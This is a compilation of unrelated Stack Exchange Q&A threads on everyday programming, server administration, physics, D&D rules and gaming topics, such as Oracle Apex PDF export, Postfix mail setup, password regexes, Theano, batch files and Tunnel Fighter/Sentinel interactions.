-0.70 -0.12 0.33 3: gene3 0.64 -0.17 2.30 -1.70
common-pile/stackexchange_filtered
wkhtmltopdf in Oracle Apex I am new to Oracle Apex CRM. I have application where i need reports to be exported to pdf. I have worked in .net application and there I have used wkhtmltopdf for exporting html to pdf. But I am not sure if I can use wkhtmltopdf in Oracle Apex ? Can anyone help me whether wkhtmltopdf is supported in Oracle Apex ? any reference If you are using the Oracle Apex Interactive Report, the export as PDF feature is already available. You can use the search bar to download the report as PDF. This can be configured on the Report Attributes tab in an Interactive Reporting component. [Apex Interactive Report Action Options] Oracle Apex Interactive Report Configuration You can even create a link to directily download the report using the "PDF" request option as follow: your application url: http://example.com/apex/f?p=MYAPPID:MYPAGE:PDF lets say Interative Report is on page 6 of application id 100: http://example.com/apex/f?p=100:6:PDF If the wkhtmltopdf executable is visible to the server, you can create a job with DBMS_SCHEDULER. but my question is .. can I use wkhtmltopdf in Oracle Apex? because I can't find any code reference /link where wkhtmltopdf is used in Oracle Apex @Mahajan344 You cannot directly call the application from Oracle Apex afaik, but you can call PL/SQL Stored Procedures in Oracle APEX, which will allow you to use DBMS_SCHEDULER. You must use to PL/SQL and then you can call this in your Page. But There is already a pdf download in Apex function. https://www.oracle.com/webfolder/technetwork/tutorials/obe/db/apex/r50/PDF%20Printing/Creating%20PDF%20Reports%20with%20Oracle%20Application%20Express%205.0%20and%20Oracle%20REST%20Data%20Services.html Hi, welcome to Stackoverflow!! It would be great if you could read these guidelines before answering any question. Thanks.
common-pile/stackexchange_filtered
Issue with sending data to a webservice, with ksoap Good evening, I need your help. Until now, using my webservice to withdraw data, there was no problem. Even to receive the data, I have to send some. Example: Login. However, now I want to send data to the webservice, and it will only return "true or false". I know I have the necessary data, but does not do what is supposed to do. That is, the method I am invoking, it needs to receive data, and with these data it does the update in the database. I know which works manually, directly on webservice. what might be wrong? Below is the code: After insert the data on the app on android, when i click on a button, do this: The message on the end, is the way that i know that i send real data: try { newpassword = newPass; Abreviatura = (EditText)findViewById(R.id.txtAbreviatura); newabreviatura = Abreviatura.getText().toString(); Nome = (EditText)findViewById(R.id.txtNome); newnome = Nome.getText().toString(); User = (EditText)findViewById(R.id.txtUsername); newusername = User.getText().toString(); rslt="START"; Caller c=new Caller(); c.newNome = newnome; c.newUser = newusername; c.newPass = newpassword; c.newAbrev = newabreviatura; c.oldusername = oldusername; c.ad=ad; c.join(); c.start(); while(rslt=="START") { try { Thread.sleep(10); }catch(Exception ex) { } } ad.setTitle("Alteração:"); ad.setMessage(BIQActivity.comando + ";" + newnome + ";" + newpassword + ";" + newabreviatura + ";" + newusername + ";" + oldusername); ad.show(); }catch(Exception ex) { } That function, uses this peace of code, to send data to the next code: csup=new CallSoapUpdatePerfil(); String resp=csup.CallUpdatePerfil(newUser, newNome, newPass, newAbrev, ldusername); Perfil.rslt = resp; Finally, this is the code that send's the data to the webservice: public class CallSoapUpdatePerfil { public final String SOAP_ACTION = "http://tempuri.org/UpdatePerfil"; public final String OPERATION_NAME = "UpdatePerfil"; public final String WSDL_TARGET_NAMESPACE = "http://tempuri.org/"; public final String SOAP_ADDRESS = "http://<IP_ADDRESS>:80/BIQAndroid/BIQAndroid.asmx"; public String CallUpdatePerfil(String User, String Pass, String Nome, String Abrev, String oldusername) { SoapObject request = new SoapObject(WSDL_TARGET_NAMESPACE,OPERATION_NAME); PropertyInfo pi=new PropertyInfo(); pi.setName("User"); pi.setValue(User); pi.setType(String.class); request.addProperty(pi); pi=new PropertyInfo(); pi.setName("Pass"); pi.setValue(Pass); pi.setType(String.class); request.addProperty(pi); pi=new PropertyInfo(); pi.setName("Abrev"); pi.setValue(Abrev); pi.setType(String.class); request.addProperty(pi); pi=new PropertyInfo(); pi.setName("Nome"); pi.setValue(Nome); pi.setType(String.class); request.addProperty(pi); pi=new PropertyInfo(); pi.setName("oldusername"); pi.setValue(oldusername); pi.setType(String.class); request.addProperty(pi); SoapSerializationEnvelope envelope = new SoapSerializationEnvelope( SoapEnvelope.VER11); envelope.dotNet = true; envelope.setOutputSoapObject(request); HttpTransportSE httpTransport = new HttpTransportSE(SOAP_ADDRESS); Object response=null; try { httpTransport.call(SOAP_ACTION, envelope); response = envelope.getResponse(); } catch (Exception exception) { response=exception.toString(); } return response.toString(); } } If anyone can help... Regards. I already find the error. The error is about the name of parameter of webservice. :s Done. Thanks anyway.
common-pile/stackexchange_filtered
Credit Memo - 'Email Copy of Credit Memo' how to set default ON How to set the 'Email Copy of Credit Memo' checkbox to a default value of checked? (So to negate the requirement to check the box every time) Is there anyway to override the single input line within items.phtml, and not override the whole items.phtml template file? Eg: I can see that the checkbox is defined in /app/design/adminhtml/default/default/template/sales/order/creditmemo/create/items.phtml by manually adding the checked html attribute to the input it has the desired effect. Any way to easily override this from custom theme code? <label class="normal" for="send_email"><?php echo Mage::helper('sales')->__('Email Copy of Credit Memo') ?></label> <input id="send_email" name="creditmemo[send_email]" value="1" type="checkbox" checked/> Very useful: https://magento.stackexchange.com/questions/30590/how-do-i-rewrite-a-single-element-in-a-phtml-file
common-pile/stackexchange_filtered
Postfix, dovecot, squirrelmail server able to send but not receive emails I have setup a mail server using this guide: https://www.ostechnix.com/setup-mail-server-using-postfixdovecotsquirrelmail-in-centosrhelscientific-linux-6-3-step-by-step/ The webmail allows to send emails between own users i.e. in local machine and to the other servers like gmail. But it cannot receive emails from outside world. Here is what I have in /etc/postfix/main.cf: alias_database = hash:/etc/aliases alias_maps = hash:/etc/aliases command_directory = /usr/sbin compatibility_level = 2 daemon_directory = /usr/libexec/postfix data_directory = /var/lib/postfix debug_peer_level = 2 debugger_command = PATH=/bin:/usr/bin:/usr/local/bin:/usr/X11R6/bin ddd $daemon_directory/$process_name $process_id & sleep 5 home_mailbox = Maildir/ html_directory = no inet_interfaces = localhost inet_protocols = all mail_owner = postfix mailq_path = /usr/bin/mailq.postfix manpage_directory = /usr/share/man meta_directory = /etc/postfix mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain mydomain = domain.com myhostname = mail.domain.com mynetworks = <IP_ADDRESS>/24, <IP_ADDRESS>/8, [::1]/128 myorigin = $mydomain newaliases_path = /usr/bin/newaliases.postfix queue_directory = /var/spool/postfix readme_directory = /usr/share/doc/postfix/README_FILES sample_directory = /usr/share/doc/postfix/samples sendmail_path = /usr/sbin/sendmail.postfix setgid_group = postdrop shlib_directory = /usr/lib64/postfix unknown_local_recipient_reject_code = 550 Mydomain and myhostname is fake though. Also our ISP shouldn't block any inbound SMTP connections on port 25, but we have to double check that in a meantime. Please, advise! Update 14/11/2017: Enabled firewalld service once again and opened the mentioned ports. Now this error appears when trying to send an email on squirrelmail: Connection refused 111 Can't open SMTP stream. Please help "Mydomain and myhostname is fake though" - How should the sending mailserver than be able to reach your mailserver? You need to use a public routeable domain and have according MX-Records defined for that domain that point to your mailserver. @Yerbol means that the variables mydomain and myhostname are fake only within the config file posted here The directive: inet_interfaces = localhost restricts Postfix to receiving mails on localhost. Try setting that to inet_interfaces = all to actually accept incoming connections from the internet as well. (And rather than completely disabling the firewall as in that recipe, open TCP port 25 (SMTP), 143 (IMAP) and 80/443 (HTTP/HTTPS) in your firewall and keep it enabled.) also had to add my ip to dns server as smtp.domain.com to actually find it from outside world, add smtp.domain.com to /etc/hosts file. i will enable the firewall as you suggested Enabled firewalld service once again and opened the mentioned ports. Now this error appears when trying to send an email on squirrelmail: Connection refused 111 Can't open SMTP stream. Please help https://serverfault.com/questions/725262/what-causes-the-connection-refused-message
common-pile/stackexchange_filtered
How to change Eclipse run script in QNX6? Related to another question, we want to change the eclipse run command. I found that eclipse can run executing the script: /usr/qnx630/host/qnx6/x86/usr/bin/qde.sh But the startup configuration is not written there. The only thing the script does is executing the file: /usr/qnx630/host/qnx6/x86/usr/qde/eclipse/eclipse This file is a binary which ends calling another one with all the startup parameters for Eclipse. So my question is: where can I find and change those parameters? Thank you for your time. I would first look at the eclipse.ini file to check if your startup configuration is not better expressed there. (that is one element for having a quicker eclipse) In your case, it should be at: /usr/qnx630/host/qnx6/x86/usr/qde/eclipse/eclipse.ini If it is not there, you could create it. It would be detected by eclipse during launch.
common-pile/stackexchange_filtered
What is "one-loop cosmological constant"? I'm following Witten's essay and I'm trying to understand the UV divergence. When he writes: In quantum field theory, this Feynman diagram with a single proper-time parameter τ, underlies the one-loop cosmological constant. Is this loop the same loop from Loop Quantum Gravity (LQG)? If the answer for the first question is yes, is the "one-loop cosmological constant" just the contribution of one-loop in this theory for the cosmological constant? https://en.wikipedia.org/wiki/One-loop_Feynman_diagram e.g. figure 1 in the essay No, this has nothing to do with Loop Quantum Gravity (I removed the corresponding tag) This is just a long comment made with the intention to help you to discover the answer by yourself. Our goal is to compute the one-loop partition function for the closed string vacuum. That's relevant because the cosmological constant is an energy density, then is natural to compute the (one-loop) partition function of the vacuum in order to define the expected (one-loop) correction to the free-energy of the vacuum. Observation (1): There is only one relevant Feynman diagram arising from the closed string sector that is relevant for this problem, that's because, by definition of "vacuum", we are assuming that no other perturbative nor non-perturbative states (open strings, branes etc.) are present. The relevant Feynman diagram is the torus partition function with no punctures; the torus partition function arises as the one-loop (genus-one) closed string partition function and the absence of punctures is the statement of the absence of asymptotic closed string states on a closed string vacuum. All this is done in detail in the book Introduction to Conformal Field theory: With Applications to String Theory (chapter 4). Observation (2): The torus partition function depends on a particular moduli $\tau$, $Z_{torus}=Z_{torus}(\tau)$. That's bad because we want to preserve modular invariance (why?), but $Z_{torus}$ is not modular invariant, however. The key is now to write the simplest modular invariant that can be written in terms of $Z_{torus}(\tau)$. Convince yourself that the answer is: $$\int_{Torus} \frac{d \tau d \bar{\tau}}{im(\tau)} Z_{torus}(\tau, \bar{\tau}),$$ if you have any doubts or want a first principle derivation, consult the discussion around equation 4.1 in the book Introduction to Conformal Field theory: With Applications to String Theory (chapter 4). Observation (3): Then, the one-loop cosmological constant in string theory is given as $$\Lambda \sim \int_{Torus} \frac{d \tau d \bar{\tau}}{im(\tau)} Z_{torus}(\tau, \bar{\tau}).$$
common-pile/stackexchange_filtered
I'm sick and throwing up all over the place, what do I do? Here's the story, I was journeying down below and finding many new things to scarf on. I'm finding turnips, morsels, chops, it's a smorgasbord down there. I eventually came across some innards and gave that a try. Boy was that a mistake. I became sick the moment it hit my tongue. I was throwing up all over the place, it was hard to move around. And with creatures swarming me and attacking me, I barely made it out alive! I was like that for 30 seconds to a minute but it felt like it was for hours, maybe days. I tried drinking water and eating some food but it didn't help at all. I just hid in a corner healing my wounds until I recovered. But I didn't like that feeling, I don't ever want to feel like that again, so no more innards for me! But if I see another one down there, I can't guarantee that I've learned my lesson and I might just forget and eat it since it looks so good... If that ever happens again, what can I do to heal myself of being sick sooner?
common-pile/stackexchange_filtered
Password must contain any one of the following criteria Password must contain any one of the following criteria 1)One Uppercase 2)one lower case 3)one Number 4)one special character. in the above criteria if any three-match then it's allowed to a valid password. like below format. 1) One number, one lower case alphabet, one uppercase alphabet ---> valid password or 2)one number, one lower case alphabet, and one special character ---> valid password or 3)one number, one uppercase alphabet, and one special character ---> valid password. Please help me how to write the regular expression for the above criteria. my requirement is any three combinations one number, one alphabet, one special character. it's like permutation combination format. if I write /(?=.\d)(?=.[a-z])(?=.[A-Z])(?=.[-._@^]).{8,16}/ format I need to verify so many conditions .so any another way. Thanks in advance. I would guess that the reason your question is getting downvoted is because you haven't tried doing this yourself yet; have a go at it - read some regex - there are online tools to test your regex live and fix it. Try your best to get there and then ask for specific help if you run into issues. Thanks for your replay. I tried to like this (?=.\d)(?=.[a-z])(?=.[A-Z])(?=.[-._@^]).{8,12}. but its's a reputation process. in thsi case i need to verify so many condtions. Post your code, and describe the problem in it. Is the order of pswd chars is important for you? the order is not mandatory If the order of the pswd chars is not important so: One number, one lower case alphabet, one uppercase alphabet ---> valid password: \d[a-z][A-Z] One number, one lower case alphabet, and one special character ---> valid password: \d[a-z][\[\\\^\$\.\|\?\*\+\(\)] One number, one uppercase alphabet, and one special character ---> valid password: \d[A-Z][\[\\\^\$\.\|\?\*\+\(\)] So if it's combined in one regex: (\d[a-z][A-Z])|(\d[a-z][\[\\\^\$\.\|\?\*\+\(\)])|(\d[A-Z][\[\\\^\$\.\|\?\*\+\(\)]) Check it up here Thanks for your replay. I need any three combinations. then I consider that a password is a valid password. If my Password raj then it's not a valid password. if my password Ra1 then it's not a valid password like etc... Assuming your special characters are [\^$.|?*+() 1) One number, one lower case alphabet, one uppercase alphabet ---> valid password [0-9][a-z][A-Z] or 2) one number, one lower case alphabet, and one special character ---> valid password [0-9][a-z][\[\\\^\$\.\|\?\*\+\(\)] or 3) one number, one uppercase alphabet, and one special character ---> valid password. [0-9][A-Z][\[\\\^\$\.\|\?\*\+\(\)] Combine them with OR (|) [0-9][a-z][A-Z]|[0-9][a-z][\[\\\^\$\.\|\?\*\+\(\)]|[0-9][A-Z][\[\\\^\$\.\|\?\*\+\(\)] I try with the above format but still issue. my requirement is any three combinations one number, one alphabet, one special character. it's like permutation combination format.
common-pile/stackexchange_filtered
Sql - How to update a column for all rows? $sql = "UPDATE debtorsmaster SET name='" . $_POST['CustName'] . "', address1='" . $_POST['Address1'] . "', address2='" . $_POST['Address2'] . "', address3='" . $_POST['Address3'] . "', How to change this to update to all rows Like that (except for the trailing ,), but preferably via using prepared statements and actually executing :) But this does update all rows in the table. That is not normally what one wants, but that is what your query does. Without a WHERE clause, you'll update all rows. BTW learn about prepared statements Looks like that is not the qhole Statements, becaus the last character is a comma As there is no where clause , the same statement can be used to update all the rows...you only need to remove the trailing , Actually this UPDATE is updating the columns name, address1, address2, address3 for all the rows in the table debtorsmaster. And as people commented without a WHERE clause you are updating all the rows, very rarely you want to do that. Because you're not adding a WHERE statement all the rows will be updated. As noted in the above comments you have a trailing , which causes the query to be invalid. Also it's adviced to use prepared statements to prevent SQL Injection. $statement = $db->prepare("UPDATE `debtorsmaster` SET `name`=?, `address1`=?, `address2`=?, `address3`=?"); $statement->bind_param("ssss", $customerName, $address1, $address2, $address3); $customerName = $_POST['CustName']; $address1 = $_POST['Address1']; $address2 = $_POST['Address2']; $address3 = $_POST['Address3']; $statement->execute(); EDIT: Above example is based on mysqli.
common-pile/stackexchange_filtered
Hosting control panel with Java EE Application Server support? I currently have WHM/cPanel on my server, but it doesn't integrate properly with any Java EE App Server. I installed Tomcat manually, and have made it work through Apache, but the configuration is more fragile than I'd like. So, I'm trying to find a replacement where a Java EE App Server can be properly integrated & managed. Requirements: Open Source / Free Software (i.e. not proprietary) Runs on CentOS (although, Debian/Fedora Core/FreeBSD are options if necessary) Supports Apache + Tomcat (or equivalent) Self-monitoring (e.g. auto-restarts MySQL if it falls over) User account management (easy setup, limit space & bandwidth quotas, etc) Friendly end-user control panel (for configuring db, mail, stats, logs, etc) Anything obvious I've forgotten. Are there any recommended software packages which do all of this? http://faq.cpanel.net/show.cgi?qa=120310982800498 http://www.apluskb.com/scripts/How_do_I_manage_my_answer2108.html cPanel claims to support Tomcat, but it doesn't actually work properly. (Although I've not actually tested with the latest cPanel releases). Plesk is not supported by my provider, so I would need to purchase it myself, and it is ridiculously expensive. I recently found OpenPanel and it looked potentially interesting, but I've not yet had a chance to investigate it further. Kloxo is another interesting and Open Source (AGPL3) one that I need to investigate further - doesn't directly support Tomcat, but still plays nice with it. Plesk is a similar commercial hosting management suite similar to CPanel, in fact most hosting providers who offer WHM/CPanel also offer Plesk, which has built in Tomcat support. Plesk runs natively on CentOS but it is only free for use on one domain. That last bit is the problem - needs to support lots of domains! We have been using Apache Geronimo here at work for about two years and it has been rock solid. It has its own built-in control panel that allows us to deploy/start/stop each app separately. You may want to give it a try. I couldn't see anything about user account management and monitoring other services (e.g. MySQL) - is this done with a GBean or some other method?
common-pile/stackexchange_filtered
How to Find specific text in a formula in Multiple Columns (based on Column Header Names) and replace with different text I am trying to make below code to work so that I can: Find specific text "AMJ" in Formulas in specific Columns with Header Names: "RmRf" and "UMD" Then once "AMJ" is found, it should be replaced with "ABC" Most of the code that I have read (whilst searching for solution to above) use column numbers instead of column headers, but my worksheet will be updated every month, so column numbers will change and that's why I would like to use column header names (in this case "RmRf" and "UMD") Public Sub FindAndConvert() Dim i As Integer Dim lastRow As Long Dim myRng As Range Dim mycell As Range Dim MyColl As Collection Dim myIterator As Variant Set MyColl = New Collection MyColl.Add "RmRf" MyColl.Add "UMD" lastRow = ActiveSheet.Cells.Find("*", SearchOrder:=xlByRows, SearchDirection:=xlPrevious).Row For i = 1 To 2000 For Each myIterator In MyColl If Cells(1, i) = myIterator Then Set myRng = Range(Cells(2, i), Cells(lastRow, i)) For Each mycell In myRng.SpecialCells(xlFormulas) mycell.Formula = Replace(mycell.Formula, "AMJ", "ABC") Next End If Next Next End Sub Why not just use Range.Replace? You have 3 loops, that's why your code takes so long to run. Ok, so it looks like the above code actually works - but it took a very long time to run - I think over 15 mins and this does not make sense as I could have done a manual find and replace for the above two columns much more quickly. The two columns "RmRf" and "UMD" are columns ATF and ATG in respectively in my sheet, so in above code I think I needed to use i = 1 To 2000 (as ATF is column number 1202 and ATG is 1203). Do you know what if anything can be done to achieve the same outcome but have the code run much faster (but still use Column Header Names)? You don't need a loop at all. Use Application.Match to find the column by header. Thank you for the Range.Replace suggestion. I am new to VBA, could I modify above code so that is uses Range.Replace or would I need to use a different code? You'd have to get rid of the loop approach, so that would be a significant modification. But, as noted, you don't need to loop. Thanks - I can see where the loops are in the code, so I can remove them, but I will need to do more research to try to figure out how to incorporate the Application.Match and Range.Replace suggestions so that I can make this work
common-pile/stackexchange_filtered
How to add lateinit var on extension property What I am trying to do is extend all my actual Fragments by adding another custom class. The problem is that we cannot inherit from 2 different classes, right? So I am trying to add extension properties by adding: var Fragment.isFocused by Delegates.notNull<Boolean>(false) fun Fragment.setFocusListenerOn(rootView: View) { rootView.onFocusChangeListener = View.OnFocusChangeListener { v, hasFocus -> this.isFocused = hasFocus } } Why? Because I need to know which Fragment is on top of my BottomNavigation. Note: each buttomNavFrag is another navigation. So, I added this function to listen back button: override fun onCreate(savedInstanceState: Bundle?) { super.onCreate(savedInstanceState) val callback = requireActivity().onBackPressedDispatcher.addCallback(this) { findNavController().navigateUp() } } The problem, that if you are on the second Fragment of all navGraphs, and you click back, all Fragments will listen to the back button. In other words, all navGraphs will return to the first Fragment... So, before the navigateUp, I would like to add: if (isFocused) But, how to make it work? EDIT: The thing I want to solve is: I have multiple web-based Fragments that extends from a class that I added as abstract with code like the following: val callback = requireActivity().onBackPressedDispatcher.addCallback(this) { if (webview.canGoBack()) webview.goBack() else onBackPressed() } I only want to navigate back on the webview (if webview can go back) whenever user clicks back button and only if user is on that specific Fragment. What happens is that only one Fragment (actually the first added) is listening to those changes, instead of all the web-based Fragment. If you create an extension property that has a backing field or a delegate, as you have, it is a static backing field or delegate, meaning it is shared by all instances of the class. This is because it is not possible to add members to a class without subclassing it on the JVM. You will need to subclass Fragment and use your subclass as the base class for all your Fragments. That, or some complicated strategy where there is a backing map of Fragments to their states, and you add lifecycle listeners to the Fragments to remove them from the map when they are destroyed. But for your specific use case, it would probably be easiest to simply check for the current focused view each time you access the property: val Fragment.isFocused: Boolean get() = activity?.currentFocus == rootView && rootView != null Though I haven't messed with focus in this way, and I don't know if your fundamental strategy for navigation is flawed. I don't know if checking just the root view will help. And I don't know what you're doing with your callback. Ok. Thanks for clarifying. So I edited the question. I am not sure if is because another static field or is because they share the property, so only the first element is listening instead of them all.
common-pile/stackexchange_filtered
Linear regression in theano What is the significance of T.mean in this example? I think T.mean would have made sense if the implementation were vectorized. Here the inputs x and y to train(x, y) are scalars, and cost only finds squared error of a single input, and iterates over the data. cost = T.mean(T.sqr(y - Y)) gradient = T.grad(cost=cost, wrt=w) updates = [[w, w - gradient * 0.01]] train = theano.function(inputs=[X, Y], outputs=cost, updates=updates, allow_input_downcast=True) for i in range(100): for x, y in zip(trX, trY): train(x, y) print w.get_value() Removing T.mean had no impact on the output pattern. You are right, T.mean has no significance here. The cost function operates on a single training sample at once, so the "mean squared error" is really just the squared error of the sample. This example implements linear regression via stochastic gradient descent, an algorithm for online optimization. SGD iterates over samples one-by-one, as is the case in this example. However, in more complex scenarios, the dataset is often processed in mini-batches, which gives better performance and convergence properties. I think that T.mean was left in the example as an artifact of mini-batch gradient descent, or to make it more explicit that the cost function is MSE.
common-pile/stackexchange_filtered
Black and white icons in Visual Studio 2012 Usually the icons files (ico/bmp/png)for Controls in Visual Studio Toolbox are embedded into the assembly as resource files. The System.Windows.Forms.dll seems to have the icon files that are colored and they are for VS2010 and lower. Where does the VS2012 loads the black-n-white icons for toolbox controls from? Also, is there a guideline on how to create these set of icons for VS2012, Since the icons should look good in both light and dark theme of VS2012. Thanks! -Datte They are not black-and-white, they have shades of gray. Pretty sure that VS2012 just re-colors the bitmap image. It's not quite so simple as creating some icons for each color theme. The icons are actually built from glyphs and color adjusted at runtime based on the theme. Have a look at the Visual Studio Dark Theme blog post where the team talks about themed icons to get an understanding of the approach they've taken. To quote the important detail: All of our Visual Studio 11 icons are maintained in an icon repository as vector graphic files To answer the follow up question you may have, I'm not sure where the vector graphics are stored. It looks like they're scattered across a myriad of DLLs. I found Resources Extract (http://www.nirsoft.net/utils/resources_extract.html) to be very helpful in recursively exporting icons from DLLs. In my quest to un-metro Visual Studio I've found that the basic toolbox icons for HTML (MVC & Web Forms) and Win Forms are stored as bitmap resources in a number of unmanaged DLLs. WPF and others are stored mostly as PNG and ICO files in the newer managed DLLs. The managed resources are a combo of directly embedded files as well as serialized Bitmaps, PNGs, Icons, Image List Streams, and binary Streams. Take a look in these files for most of the toolbox images \Microsoft Visual Studio 11.0\Common7\IDE\1033\Microsoft.VisualStudio.Windows.FormsUI.dll \Microsoft Visual Studio 11.0\Common7\Packages\htmled.dll As for how the color is modified, it looks like Visual Studio replaces white with black, along with changing shades of white/grey to their darker counterpart while leaving the rest of the color alone. In years past they've included a style guidline document along with the SDK. I haven't found one yet for 2012 and their MSDN link still points to the 2010 document.
common-pile/stackexchange_filtered
Plotting 3D graphic for a differential system with Manipulate I try to adapt the following code with three differential equations to a system with four differential equations. My aim is to see a bifurcation in this differential system by looking at three variables of the system. (Mathematically, I proved the possibility of bifurcations for some exogenous parameter set) I have the following code : Manipulate[ With[{sol = First[NDSolve[{{λ'[ t] == (((ρ + θ) - a Subscript[α, 1] k^( Subscript[α, 1] - 1)) λ[t] - μ[ t] γ a Subscript[α, 1] k^( Subscript[α, 1] - 1) - θ (((1 - E^( n (-ζ + θ + ρ))) (k^(-1 - α) \ α ψ + ((-1 + E^(( n (-ζ + θ + ρ))/(-1 + β + \ σ))) (a k^Subscript[α, 1])^(( 1 - σ)/β) (-1 + β + σ) \ (((-1 + E^(( n β (-ζ + θ + ρ))/(-1 + \ β + σ))) (-1 + β + σ))/(-ζ + θ \ + ρ))^(-1 + σ) Subscript[α, 1])/( k β (-ζ + θ + ρ))))/(ζ \ - θ - ρ))), μ'[ t] == ((ρ + θ) μ[t] - μ [t] (1 - 2 s)), k'[t] == ( a k^Subscript[α, 1] - ((λ [ t] β )/((((β + σ - 1) (1 - Exp[-(((ζ - (ρ + θ)) n)/(β + \ σ - 1))]))/(ζ - (ρ + \ θ)))/((((β + σ - 1) (1 - Exp[-(((ζ - (ρ + θ)) β n)/(\ β + σ - 1))]))/(ζ - (ρ + θ)))^( 1 - σ))) )^(β/(1 - β - σ))), s'[t] == (s (1 - s) - γ a k^Subscript[α, 1])}, k[0] == 8424.78495705205 (1 - 10^-15), s[0] == 0.45999999999999996 (1 - 10^-15), μ[ 0] == -4787.8954001202255 (1 - 10^-15), λ[0] == 96.96238348579865 (1 - 10^-15)}, {λ, μ, k, s}, {t, 0, tf}, MaxSteps -> ∞]]}, Column[{ ParametricPlot3D[ Evaluate[{k[t], λ[t], s[t]} /. sol], {t, 0, tf}, BoxRatios -> 1, PlotPoints -> 1000, PlotRange -> All, ImageSize -> {400, 400}, SphericalRegion -> True, Ticks -> False], Plot[Evaluate[{k[t], λ[t], s[t]} /. sol], {t, 0, tf}, PlotStyle -> Automatic, ImageSize -> 400, AspectRatio -> 1/6]}]], {{tf, 130, Style["t", Italic]}, 1, 130, ImageSize -> Tiny}, {{θ, 0.95`}, -.1, 1, ImageSize -> Tiny}, {{β, 0.65`}, 0.18, 3, ImageSize -> Tiny}, {{ρ, 1`}, 0.01, 1, ImageSize -> Tiny}, {{Subscript[α, 1], 1`}, -.1, 1, ImageSize -> Tiny}, {{ψ, 100}, -.1, 100, ImageSize -> Tiny}, {{γ, 0.05}, -.0 .01, 0.05, ImageSize -> Tiny}, {{ζ, 0.05}, -.0 .01, 0.05, ImageSize -> Tiny}, {{σ, 0.05}, -.0 .1, 2, ImageSize -> Tiny}, {{α, 0.05}, -.0 .1, 2, ImageSize -> Tiny}, {{a, 0.05}, -.0 .1, 4, ImageSize -> Tiny}, {{n, 90}, -.0 .1, 90, ImageSize -> Tiny}, ControlPlacement -> Left, SynchronousUpdating -> False] I know that equations look horrible, sorr for that. When I remove NDSolve part from Manipulate and attribute all parameters by numerical values below (there are 11 constant parameters in total + time $t$), everythings work but I don't know why the code does not give any output with Manipulate. What am I missing ? paramFinal = {ρ -> 0.05, θ -> 0.03, n -> 80, Subscript[α, 1] -> 0.3, α -> 0.65, β -> 1.05, a -> 1.65, γ -> 0.01, σ -> 0.5, ψ -> 1, ζ -> 0.014870264736785313}; A hint: extract the NDSolve part from your Manipulate and fix ts to 130. You will see that your parameter and function substitutions contain errors. The final equations you use in NDSolve still contain unsubstituted parameters and you don't get a solution. When you fixed this and get a solution, you can take care of your Manipulate but not sooner. How can you vary d as a parameter, whereas d is defined as an expression? @halirutan Thanks for the hint. When I extract the NDSolve from Manipulate as you have mentionned and attribute numerical values to parameters, everything works fine but with Manipulate, there are no error messages but any output neither. @optimalcontrol I don't see how that's possible. You have multiple instances in your code of k and s appearing without their argument, for which NDSolve complains loudly. Are you sure you are using the exact same code in your notebook?
common-pile/stackexchange_filtered
cd to a search result with dir in cmd I want to know how to change to the directory containing a particular file name, using a batch file. First, I want to search for a particular file using the dir command. I know there will only be one file found. I then want to cd to the directory containing that file. Any suggestions? This should work if you're only searching on the file name (edit: but only if the search uses a wildcard): for /R %%i in ("myfile.*") do cd "%%~dpi" (Replace %% with % if running from the command line rather than in a batch file.) If the search doesn't use a wildcard, you could do this: for /R %%i in (.) if exist "%%i\myfile.txt" do cd "%%i" If you need to use the dir command because you want to, e.g., select only read-only files, this is another option: for /F "usebackq tokens=*" %%i in (`dir /s /b /ar "readonly.txt"`) do cd "%%~dpi" Your 1st code will not work as written because the FOR will iterate a value for each subdirectory, regardless whether "myfile.txt" exists. You need to add IF EXIST "%%i" to the DO clause. @dbenham: ah, right. When I tested it I was using a wildcard, in that case it works.
common-pile/stackexchange_filtered
Scanning for I2C addresses I'm trying to find the I2C address of an IMU plugged into my Arduino using the code from this URL: http://playground.arduino.cc/Main/I2cScanner. However, the program stalls at this stage: Why could this be happening? Pull-up resistors present? In all likelihood it's a hardware problem. Without more details it is hard to say what that might be. You might mention what device you are using exactly, and exactly what wiring you are using, including pull-up resistors. When the I2C scanner stops, it halts in the function Wire.endTransmission. The cause is a hardware problem of the I2C bus. For example the SDA or SCL are shortcut to something or pull-up resistors are missing (as already mentioned by TisteAndii) or the sensor module is not powered. I assume that the IMU module has already pull-up resistors for SDA and SCL on the module. Which IMU module is it ? How did you connect it ? Do you have other I2C modules to test the I2C bus ?
common-pile/stackexchange_filtered
How does the UA Tunnel Fighter fighting style's reaction attack interact with the Sentinel feat's speed-reduction effect? So lets say I'm a Fighter (F), and a Creature (C) is standing to my side, within my reach (*), like this: o o o o o o * * * o o * F * o o * C * o o o o o o If that creature attempts to move past me (to the left or right) and exit my reach (into the o-zone), will the reaction attack from the Tunnel Fighter fighting style (from Unearthed Arcana: Light, Dark, Underdark!) trigger as he's leaving my reach? I would guess yes, because he has to move a few inches to begin the process of leaving my reach, at which point he's "moved more than 5 feet", which triggers Tunnel Fighter's reaction. If I'm right about that, Tunnel Fighter and the Sentinel feat (PHB, p. 169-170) have an interesting interaction that I'd like clarification on. Assuming I'm in the Tunnel Fighter stance when this happens, I can potentially take an Attack of Opportunity upon the creature as he leaves my reach and use my Reaction to attack him with Tunnel Fighter's trigger. However, Sentinel makes that AO stop the creature in its tracks. Can I take both an Opportunity Attack and the Tunnel Fighter reaction attack in this particular situation? If the creature starts in the bottom-right *, I assume the answer is a cut and dry "Yes", since he's clearly "moving more than 5 feet while within my reach" and won't get stopped by Sentinel until he's already moved 10 feet. The uncertainty arises when Sentinel's OA effect prevents him from taking the second 5 feet of movement. And in the same vein, it's clear that the answer is "No" if the creature moves directly down. It has left my reach before it has moved more than 5 feet, so Tunnel Fighter's reaction attack definitely won't trigger. Yes, you can make both a Sentinel opportunity attack and a Tunnel Fighter "within reach" attack. The key point is to read each and see what resources and ordering they use. The wording for the Tunnel Fighter fighting style says: While in your defensive stance, you can make opportunity attacks without using your reaction, and you can use your reaction to make a melee attack against a creature that moves more than 5 feet while within your reach. And the Sentinel feat (PHB, p. 169-170) reads: When you hit a creature with an opportunity attack, the creature's speed becomes 0 for the rest of the turn. Thus the Tunnel Fighter defensive stance allows opportunity attacks to occur without a reaction, and therefore allows a Sentinel attack to happen without expending your reaction. The uncertain area can also be solved by observing that "more than 5 feet" is anything more than 5 feet, rather than just hopping into then out of reach. Taking your example, traveling from any "*" to an adjacent is just 5 feet, but anything more is more than 5 feet. In the case of a creature and the player in the positions you outline, the Tunnel Fighter attack would resolve just before the creature leaves your reach, and then the Sentinel attack of opportunity would resolve as the creature leaves your reach, stopping it in its tracks if successful. To further clarify: the Tunnel Fighter attack that can be taken as a reaction to an enemy's movement is not an opportunity attack, and thus the speed reduction on a successful hit from 